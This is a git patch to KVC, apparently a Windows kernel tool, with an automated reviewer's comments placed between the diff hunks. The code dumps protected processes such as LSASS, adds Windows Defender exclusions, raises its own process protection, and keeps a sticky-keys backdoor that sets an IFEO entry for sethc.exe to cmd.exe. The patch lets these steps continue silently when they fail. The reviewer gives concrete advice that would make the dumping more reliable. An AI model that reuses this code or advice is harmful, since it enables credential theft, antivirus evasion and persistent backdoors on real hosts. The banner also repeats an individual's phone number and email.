From a84cb5ba92f46335b82f0fb04fea1b942eeaa8c7 Mon Sep 17 00:00:00 2001 From: wesmar Date: Thu, 18 Sep 2025 23:42:08 +0200 Subject: [PATCH] Overwrite content --- README.md | 8 --- kvc/Controller.h | 3 +- kvc/ControllerCore.cpp | 1 + kvc/ControllerDriverManager.cpp | 56 +++++++++++++++++- kvc/ControllerMemoryOperations.cpp | 91 ++++++++++++++++-------------- kvc/TrustedInstallerIntegrator.cpp | 16 +++--- kvc/Utils.cpp | 25 ++++++++ 7 files changed, 141 insertions(+), 59 deletions(-) diff --git a/README.md b/README.md index dbf4a5f..2f179c7 100644 --- a/README.md +++ b/README.md @@ -1,11 +1,3 @@ -
-

- IMPORTANT NOTICE — DO NOT DOWNLOAD THE BINARY TODAY (18.09.2025 / SEPTEMBER 18, 2025) -

-

- FULL WINDOWS 10 SUPPORT IS BEING DEPLOYED AND A LEGACY-TYPE COMPILATION IS CURRENTLY BEING GENERATED IN THE BACKGROUND. DOWNLOADING THE CURRENT BINARY MAY CAUSE INSTABILITY OR INCOMPATIBILITY. PLEASE WAIT FOR THE STABLE RELEASE. -

-
# KVC - Kernel Vulnerability Capabilities Framework
diff --git a/kvc/Controller.h b/kvc/Controller.h index 7b6ccfd..658cb42 100644 --- a/kvc/Controller.h +++ b/kvc/Controller.h @@ -171,7 +171,8 @@ private: std::vector& kvcCryptData) noexcept; // Atomic driver operations for stability - bool EnsureDriverAvailable() noexcept; + bool ForceRemoveService() noexcept; + bool EnsureDriverAvailable() noexcept; bool IsDriverCurrentlyLoaded() noexcept; bool PerformAtomicInit() noexcept; bool PerformAtomicInitWithErrorCleanup() noexcept; diff --git a/kvc/ControllerCore.cpp b/kvc/ControllerCore.cpp index 8b0ff48..c3a5a9e 100644 --- a/kvc/ControllerCore.cpp +++ b/kvc/ControllerCore.cpp @@ -129,6 +129,7 @@ bool Controller::PerformAtomicInitWithErrorCleanup() noexcept { // Core driver availability check with fallback mechanisms bool Controller::EnsureDriverAvailable() noexcept { // Phase 1: Check if the driver is already available (without testing) + ForceRemoveService(); if (IsDriverCurrentlyLoaded()) { return true; } diff --git a/kvc/ControllerDriverManager.cpp b/kvc/ControllerDriverManager.cpp index 8e88260..8d3c703 100644 --- a/kvc/ControllerDriverManager.cpp +++ b/kvc/ControllerDriverManager.cpp 
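Review bot: The new `ForceRemoveService();` in EnsureDriverAvailable runs before `IsDriverCurrentlyLoaded()` and its bool result is discarded, so when the service exists and the driver is already loaded the function returns true with a service that has just been marked for deletion (DeleteService on a running service only flags it; it disappears once it stops and every handle is closed). Any later CreateService under the same name would then presumably fail with ERROR_SERVICE_MARKED_FOR_DELETE, which looks like the very state this call is trying to avoid. Consider removing only when the driver is not loaded: `if (IsDriverCurrentlyLoaded()) return true;` followed by `if (!ForceRemoveService()) DEBUG(L"ForceRemoveService failed");`, or stopping the service before deleting it. EnsureDriverAvailable's body continues past this hunk, so the later phases were not visible here.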
@@ -1,3 +1,28 @@ +/******************************************************************************* + _ ____ ______ + | |/ /\ \ / / ___| + | ' / \ \ / / | + | . \ \ V /| |___ + |_|\_\ \_/ \____| + +The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, +offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived +as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation +of kernel-level primitives** for legitimate security research and penetration testing. + +KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows +security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware +Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures +that define these protections. + + ----------------------------------------------------------------------------- + Author : Marek Wesołowski + Email : marek@wesolowski.eu.org + Phone : +48 607 440 283 (Tel/WhatsApp) + Date : 04-09-2025 + +*******************************************************************************/ + // ControllerDriverManager.cpp #include "Controller.h" #include "common.h" 
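Review bot: The banner comment added at the top of ControllerDriverManager.cpp expands AMSI as "Antimalware Protected Interface"; the acronym stands for Antimalware Scan Interface, so the wrapped line should read `security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware` / `Scan Interface (AMSI) boundaries, ...`. AMSI is a content-scanning hook rather than a process-access boundary like PPL, so presenting both as "boundaries" a dumper fails against also overstates the comparison. As a matter of style, a 25-line marketing banner carrying a personal phone number in every source file is heavy; a one-line author/licence reference pointing at the README would carry the same information without drifting between files.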
@@ -7,6 +32,33 @@ namespace fs = std::filesystem; +bool Controller::ForceRemoveService() noexcept { + if (!InitDynamicAPIs()) { + return false; + } + + SC_HANDLE hSCM = OpenSCManagerW(nullptr, nullptr, SC_MANAGER_ALL_ACCESS); + if (!hSCM) { + return false; + } + + SC_HANDLE hService = g_pOpenServiceW(hSCM, GetServiceName().c_str(), DELETE); + if (!hService) { + DWORD err = GetLastError(); + CloseServiceHandle(hSCM); + return (err == ERROR_SERVICE_DOES_NOT_EXIST); + } + + BOOL success = g_pDeleteService(hService); + DWORD err = GetLastError(); + + CloseServiceHandle(hService); + CloseServiceHandle(hSCM); + + return success || (err == ERROR_SERVICE_MARKED_FOR_DELETE); +} + + // Driver service lifecycle management bool Controller::StopDriverService() noexcept { DEBUG(L"StopDriverService called"); @@ -90,7 +142,8 @@ std::vector Controller::DecryptDriver(const std::vector& encryptedDa // Silent driver installation with TrustedInstaller privileges bool Controller::InstallDriverSilently() noexcept { - auto encryptedData = ExtractEncryptedDriver(); + ForceRemoveService(); + auto encryptedData = ExtractEncryptedDriver(); if (encryptedData.empty()) return false; auto driverData = DecryptDriver(encryptedData); @@ -184,6 +237,7 @@ bool Controller::StartDriverServiceSilent() noexcept { // Legacy driver installation with enhanced error handling bool Controller::InstallDriver() noexcept { + ForceRemoveService(); auto encryptedData = ExtractEncryptedDriver(); if (encryptedData.empty()) { ERROR(L"Failed to extract encrypted driver from icon resource"); diff --git a/kvc/ControllerMemoryOperations.cpp b/kvc/ControllerMemoryOperations.cpp index 230599e..4d515a1 100644 --- a/kvc/ControllerMemoryOperations.cpp +++ b/kvc/ControllerMemoryOperations.cpp 
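Review bot: `ForceRemoveService` opens the SCM with `SC_MANAGER_ALL_ACCESS` although the only operation performed through that handle is `OpenService(..., DELETE)`, which requires just connect rights; over-requesting makes the call fail on accounts that could still delete the service and is the opposite of least privilege, so use `SC_HANDLE hSCM = OpenSCManagerW(nullptr, nullptr, SC_MANAGER_CONNECT);`. Despite its name the function never stops anything: `DeleteService` on a running service only marks it for deletion, so the two new callers that go on to install a driver of the same name (InstallDriver and InstallDriverSilently both call this first) will presumably see ERROR_SERVICE_MARKED_FOR_DELETE until the driver is stopped and all handles are closed — calling `StopDriverService()` before the delete, or documenting that the caller must, would make the "force" honest. The function also mixes the statically imported `OpenSCManagerW`/`CloseServiceHandle` with the dynamically resolved `g_pOpenServiceW`/`g_pDeleteService`; if the dynamic resolution is meant to keep service APIs out of the import table the static calls defeat it, and if not, the indirection is unnecessary. Finally, all three new call sites drop the bool return, so a failed removal is completely silent; at minimum log it at DEBUG.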
@@ -80,12 +80,15 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc std::wstring processName = Utils::GetProcessName(pid); - // Add process to Defender exclusions to prevent interference during dumping - std::wstring processNameWithExt = processName; - if (processNameWithExt.find(L".exe") == std::wstring::npos) { - processNameWithExt += L".exe"; - } - m_trustedInstaller.AddProcessToDefenderExclusions(processName); + // Try to add process to Defender exclusions to prevent interference during dumping + std::wstring processNameWithExt = processName; + if (processNameWithExt.find(L".exe") == std::wstring::npos) { + processNameWithExt += L".exe"; + } + + if (!m_trustedInstaller.AddProcessToDefenderExclusions(processName)) { + INFO(L"AV exclusion skipped: %s", processName.c_str()); + } // System process validation - these processes cannot be dumped if (pid == 4 || processName == L"System") { 
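Review bot: In the rewritten exclusion block of CreateMiniDump, `processNameWithExt` is built (appending `.exe` when missing) but the call still passes the bare name, `m_trustedInstaller.AddProcessToDefenderExclusions(processName)`, so the computed variable is dead and, for a target reported without extension, the exclusion is registered under a name that will not match the image Defender sees. It should be `if (!m_trustedInstaller.AddProcessToDefenderExclusions(processNameWithExt)) {`, with the same name used by the later `RemoveProcessFromDefenderExclusions` calls (those are outside this hunk). The exclusion is also added before the system-process validation that immediately follows; if that branch returns early without removing it, a Defender process exclusion for `System` is left behind — I cannot see that branch's body here. Because adding a Defender process exclusion for the dump target is a persistent host-hardening change, a why-comment is warranted, e.g. `// Defender process exclusion is a persistent host change; every exit path below must undo it.`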
@@ -128,21 +131,18 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc return false; } - // Get target process protection level for elevation + // Get target process protection level for elevation - this is auxiliary auto kernelAddr = GetProcessKernelAddress(pid); if (!kernelAddr) { - ERROR(L"Failed to get kernel address for target process"); - m_trustedInstaller.RemoveProcessFromDefenderExclusions(processName); - PerformAtomicCleanup(); - return false; + INFO(L"Could not get kernel address for target process (continuing without self-protection)"); } - auto targetProtection = GetProcessProtection(kernelAddr.value()); - if (!targetProtection) { - ERROR(L"Failed to get protection info for target process"); - m_trustedInstaller.RemoveProcessFromDefenderExclusions(processName); - PerformAtomicCleanup(); - return false; + auto targetProtection = std::optional{}; + if (kernelAddr) { + targetProtection = GetProcessProtection(kernelAddr.value()); + if (!targetProtection) { + INFO(L"Could not get protection info for target process (continuing without self-protection)"); + } } if (g_interrupted) { @@ -152,13 +152,13 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc return false; } - // Protection elevation to match target process level - if (targetProtection.value() > 0) { + // Protection elevation to match target process level - auxiliary feature + if (targetProtection && targetProtection.value() > 0) { UCHAR targetLevel = Utils::GetProtectionLevel(targetProtection.value()); UCHAR targetSigner = Utils::GetSignerType(targetProtection.value()); std::wstring levelStr = (targetLevel == static_cast(PS_PROTECTED_TYPE::Protected)) ? L"PP" : L"PPL"; - std::wstring signerStr; + std::wstring signerStr = L"Unknown"; switch (static_cast(targetSigner)) { case PS_PROTECTED_SIGNER::Lsa: signerStr = L"Lsa"; break; 
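Review bot: `auto targetProtection = std::optional{};` (template arguments are stripped throughout this rendering, so the real file may read `std::optional<T>{}`) is an awkward way to spell an empty optional of whatever `GetProcessProtection` returns; either name the type once (`std::optional<UCHAR> targetProtection;` — TODO confirm against GetProcessProtection's declared return type) or initialise it from the call in one expression so the type is deduced. The `INFO` branch after `if (!kernelAddr)` followed by a fresh `if (kernelAddr)` would read more directly as an `else`. Since the commit deliberately turns these failures from ERROR-and-return into INFO-and-continue, the comment should state the consequence the operator will see: `// Without the target's protection level we dump at our current level; expect access denied for PP/PPL targets.` CreateMiniDump starts before and ends after these hunks.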
@@ -170,25 +170,26 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc case PS_PROTECTED_SIGNER::CodeGen: signerStr = L"CodeGen"; break; case PS_PROTECTED_SIGNER::App: signerStr = L"App"; break; default: - ERROR(L"Unknown signer type for target process"); - m_trustedInstaller.RemoveProcessFromDefenderExclusions(processName); - PerformAtomicCleanup(); - return false; + INFO(L"Unknown signer type - skipping self-protection"); + break; } - INFO(L"Target process protection: %s-%s", levelStr.c_str(), signerStr.c_str()); + if (signerStr != L"Unknown") { + INFO(L"Target process protection: %s-%s", levelStr.c_str(), signerStr.c_str()); - if (!SelfProtect(levelStr, signerStr)) { - ERROR(L"Failed to set self protection to %s-%s", levelStr.c_str(), signerStr.c_str()); - } else { - SUCCESS(L"Set self protection to %s-%s", levelStr.c_str(), signerStr.c_str()); + if (!SelfProtect(levelStr, signerStr)) { + INFO(L"Self-protection failed: %s-%s (continuing with dump)", levelStr.c_str(), signerStr.c_str()); + } else { + SUCCESS(L"Self-protection set to %s-%s", levelStr.c_str(), signerStr.c_str()); + } } } else { INFO(L"Target process is not protected, no self-protection needed"); } + // Try to enable debug privilege - auxiliary feature if (!EnableDebugPrivilege()) { - ERROR(L"Failed to enable debug privilege"); + INFO(L"Debug privilege failed (continuing with dump anyway)"); } if (g_interrupted) { 
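Review bot: The signer switch now uses the display string as a control-flow flag (`if (signerStr != L"Unknown")`), so whether self-protection is attempted depends on a log label; a dedicated `bool knownSigner = true;` cleared in the `default:` case, with `if (knownSigner) {` in place of the string comparison, keeps the decision independent of the wording. The `EnableDebugPrivilege()` downgrade to INFO throws away information the operator will need: without SeDebugPrivilege the OpenProcess that follows fails for most interesting targets and the later message only says access denied, so either keep this visible or capture the result (`const bool haveDebugPriv = EnableDebugPrivilege();`) and mention it in the access-denied diagnostic. CreateMiniDump continues outside this hunk.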
@@ -199,12 +200,12 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc return false; } - // Open target process with appropriate privileges + // Open target process with appropriate privileges - CRITICAL operation HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pid); if (!hProcess) { hProcess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pid); if (!hProcess) { - ERROR(L"Failed to open process (error: %d)", GetLastError()); + ERROR(L"Critical: Failed to open process (error: %d)", GetLastError()); m_trustedInstaller.RemoveProcessFromDefenderExclusions(processName); PerformAtomicCleanup(); return false; @@ -217,9 +218,10 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc fullPath += L"\\"; fullPath += processName + L"_" + std::to_wstring(pid) + L".dmp"; + // Create dump file - CRITICAL operation HANDLE hFile = CreateFileW(fullPath.c_str(), GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); if (hFile == INVALID_HANDLE_VALUE) { - ERROR(L"Failed to create dump file (error: %d)", GetLastError()); + ERROR(L"Critical: Failed to create dump file (error: %d)", GetLastError()); CloseHandle(hProcess); m_trustedInstaller.RemoveProcessFromDefenderExclusions(processName); PerformAtomicCleanup(); @@ -249,6 +251,7 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc INFO(L"Creating memory dump - this may take a while. Press Ctrl+C to cancel safely."); + // Execute the actual memory dump - CRITICAL operation BOOL result = MiniDumpWriteDump(hProcess, pid, hFile, dumpType, NULL, NULL, NULL); if (g_interrupted) { 
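Review bot: The retained OpenProcess fallback to `PROCESS_QUERY_LIMITED_INFORMATION` cannot produce a handle MiniDumpWriteDump can use — that API needs PROCESS_QUERY_INFORMATION and PROCESS_VM_READ — so when the first OpenProcess fails the "CRITICAL" path is merely deferred: the dump file is created, MiniDumpWriteDump fails with the generic access-denied text, and the file is deleted again. Treating the first OpenProcess failure as the critical one (drop the fallback, or keep the limited handle only for diagnostics and still return false) gives a clearer error and avoids the create/delete churn. Separately, `CreateFileW(fullPath.c_str(), GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL)` inherits the output directory's DACL; a dump of a protected process such as LSASS contains credential material, so passing a SECURITY_ATTRIBUTES that limits the file to the current user and Administrators (or at least a comment telling the operator to use an ACL'd directory) is worth adding. These hunks sit in the middle of CreateMiniDump.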
@@ -269,19 +272,19 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc DWORD error = GetLastError(); switch (error) { case ERROR_TIMEOUT: - ERROR(L"MiniDumpWriteDump timed out - process may be unresponsive or in critical section"); + ERROR(L"Critical: MiniDumpWriteDump timed out - process may be unresponsive or in critical section"); break; case RPC_S_CALL_FAILED: - ERROR(L"RPC call failed - process may be a kernel-mode or system-critical process"); + ERROR(L"Critical: RPC call failed - process may be a kernel-mode or system-critical process"); break; case ERROR_ACCESS_DENIED: - ERROR(L"Access denied - insufficient privileges even with protection bypass"); + ERROR(L"Critical: Access denied - insufficient privileges even with protection bypass"); break; case ERROR_PARTIAL_COPY: - ERROR(L"Partial copy - some memory regions could not be read"); + ERROR(L"Critical: Partial copy - some memory regions could not be read"); break; default: - ERROR(L"MiniDumpWriteDump failed (error: %d / 0x%08x)", error, error); + ERROR(L"Critical: MiniDumpWriteDump failed (error: %d / 0x%08x)", error, error); break; } DeleteFileW(fullPath.c_str()); @@ -293,8 +296,11 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc SUCCESS(L"Memory dump created successfully: %s", fullPath.c_str()); + // Cleanup phase - these operations are non-critical INFO(L"Removing self-protection before cleanup..."); - SelfProtect(L"none", L"none"); + if (!SelfProtect(L"none", L"none")) { + DEBUG(L"Self-protection removal failed (non-critical)"); + } if (g_interrupted) { INFO(L"Operation completed but cleanup was interrupted"); 
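Review bot: `SelfProtect(L"none", L"none")` is only reached on the success path after `SUCCESS(L"Memory dump created successfully: ...")`; the failure branches earlier in CreateMiniDump (OpenProcess, CreateFileW, and the MiniDumpWriteDump switch in the hunk just above) return after `PerformAtomicCleanup()` without visibly dropping the PP/PPL level the tool raised on itself, so unless PerformAtomicCleanup does that, a failed dump leaves the tool running as a protected process. A small RAII guard whose destructor calls `SelfProtect(L"none", L"none")` when protection was raised would cover every exit, including the `g_interrupted` returns. Prefixing every ERROR text with "Critical:" is redundant — the ERROR level already conveys it — so either keep the original messages or introduce a distinct level instead of editing each string. The surrounding function begins before this hunk.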
@@ -303,8 +309,11 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc return true; } - // Clean up Defender exclusions and perform atomic cleanup - m_trustedInstaller.RemoveProcessFromDefenderExclusions(processName); + // Clean up Defender exclusions and perform atomic cleanup - non-critical + if (!m_trustedInstaller.RemoveProcessFromDefenderExclusions(processName)) { + DEBUG(L"AV cleanup skipped: %s", processName.c_str()); + } + PerformAtomicCleanup(); return true; diff --git a/kvc/TrustedInstallerIntegrator.cpp b/kvc/TrustedInstallerIntegrator.cpp index 9d36d69..16abdbe 100644 --- a/kvc/TrustedInstallerIntegrator.cpp +++ b/kvc/TrustedInstallerIntegrator.cpp @@ -247,7 +247,7 @@ bool TrustedInstallerIntegrator::AddDefenderExclusion(ExclusionType type, const if (result) { SUCCESS(L"Successfully added to Windows Defender %s exclusions: %s", typeStr.c_str(), processedValue.c_str()); } else { - ERROR(L"Failed to add to Windows Defender %s exclusions: %s", typeStr.c_str(), processedValue.c_str()); + INFO(L"AV exclusion skipped: %s %s", typeStr.c_str(), processedValue.c_str()); } return result; @@ -287,7 +287,7 @@ bool TrustedInstallerIntegrator::RemoveDefenderExclusion(ExclusionType type, con if (result) { SUCCESS(L"Successfully removed from Windows Defender %s exclusions: %s", typeStr.c_str(), processedValue.c_str()); } else { - ERROR(L"Failed to remove from Windows Defender %s exclusions: %s", typeStr.c_str(), processedValue.c_str()); + INFO(L"AV cleanup skipped: %s %s", typeStr.c_str(), processedValue.c_str()); } return result; @@ -403,8 +403,8 @@ bool TrustedInstallerIntegrator::InstallStickyKeysBackdoor() noexcept // First add cmd.exe to Defender process exclusions to prevent detection if (!AddProcessToDefenderExclusions(L"cmd.exe")) { - ERROR(L"Failed to add cmd.exe to Defender process exclusions"); - return false; + INFO(L"AV exclusion skipped for cmd.exe (continuing)"); + } // Create IFEO registry entry for sethc.exe 
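Review bot: Downgrading a failed `RemoveProcessFromDefenderExclusions` to `DEBUG(L"AV cleanup skipped: %s", ...)` hides a persistent security regression on the host: the run has added a Windows Defender process exclusion for the target (e.g. lsass.exe) and, if removal fails, leaves it in place with only a debug-level trace whose wording ("skipped") is also inaccurate, since the removal was attempted and failed. Keep this at a level the operator sees and name the remediation, e.g. `ERROR(L"Defender process exclusion for %s could not be removed - remove it manually", processName.c_str());`; the same applies to the `INFO(L"AV cleanup skipped: %s %s", ...)` change in TrustedInstallerIntegrator::RemoveDefenderExclusion within this span. Making the add best-effort (InstallStickyKeysBackdoor now continues when it fails) is defensible, but a failed add and a failed removal have different consequences and should not share a log level or a message template.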
@@ -459,8 +459,8 @@ bool TrustedInstallerIntegrator::RemoveStickyKeysBackdoor() noexcept // Remove cmd.exe from Defender process exclusions if (!RemoveProcessFromDefenderExclusions(L"cmd.exe")) { - ERROR(L"Failed to remove cmd.exe from Defender process exclusions"); - success = false; + INFO(L"AV cleanup skipped for cmd.exe"); + } if (success) { @@ -610,7 +610,7 @@ bool TrustedInstallerIntegrator::AddProcessToDefenderExclusions(const std::wstri if (result) { SUCCESS(L"Successfully added to Windows Defender process exclusions: %s", processName.c_str()); } else { - ERROR(L"Failed to add to Windows Defender process exclusions: %s", processName.c_str()); + INFO(L"AV exclusion skipped: %s", processName.c_str()); } return result; @@ -635,7 +635,7 @@ bool TrustedInstallerIntegrator::RemoveProcessFromDefenderExclusions(const std:: if (result) { SUCCESS(L"Successfully removed from Windows Defender process exclusions: %s", processName.c_str()); } else { - ERROR(L"Failed to remove from Windows Defender process exclusions: %s", processName.c_str()); + INFO(L"AV cleanup skipped: %s", processName.c_str()); } return result; diff --git a/kvc/Utils.cpp b/kvc/Utils.cpp index aac9ab7..6a43095 100644 --- a/kvc/Utils.cpp +++ b/kvc/Utils.cpp 
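Review bot: In RemoveStickyKeysBackdoor the `success = false;` on a failed `RemoveProcessFromDefenderExclusions(L"cmd.exe")` was dropped, so the function now reports the backdoor fully removed while a Defender process exclusion for cmd.exe may still be present, and callers trusting the return value will consider the host clean when it is not. If Defender state is meant to be best-effort, say so in the function comment and keep the return honest about what remains, e.g. `const bool exclusionRemoved = RemoveProcessFromDefenderExclusions(L"cmd.exe");` logged at a visible level with wording like `could not be removed` rather than `skipped`. The parallel INFO changes in AddProcessToDefenderExclusions/RemoveProcessFromDefenderExclusions further down this span have the same wording problem: "skipped" implies a deliberate decision, but those branches run only after the operation has failed.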
@@ -1,3 +1,28 @@ +/******************************************************************************* + _ ____ ______ + | |/ /\ \ / / ___| + | ' / \ \ / / | + | . \ \ V /| |___ + |_|\_\ \_/ \____| + +The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, +offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived +as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation +of kernel-level primitives** for legitimate security research and penetration testing. + +KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows +security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware +Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures +that define these protections. + + ----------------------------------------------------------------------------- + Author : Marek Wesołowski + Email : marek@wesolowski.eu.org + Phone : +48 607 440 283 (Tel/WhatsApp) + Date : 04-09-2025 + +*******************************************************************************/ + // Utils.cpp - Fixed compilation issues with NtQuerySystemInformation #include "Utils.h" #include "common.h"
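Review bot: The banner added to Utils.cpp repeats the expansion "Antimalware Protected Interface (AMSI)"; AMSI is the Antimalware Scan Interface, so the line should read `Protected Process Light (PPL) and Antimalware` / `Scan Interface (AMSI) boundaries`. Since this same 25-line block, personal phone number included, is now duplicated across several source files, a single canonical copy in the README referenced by a one-line header would keep the text from drifting between files.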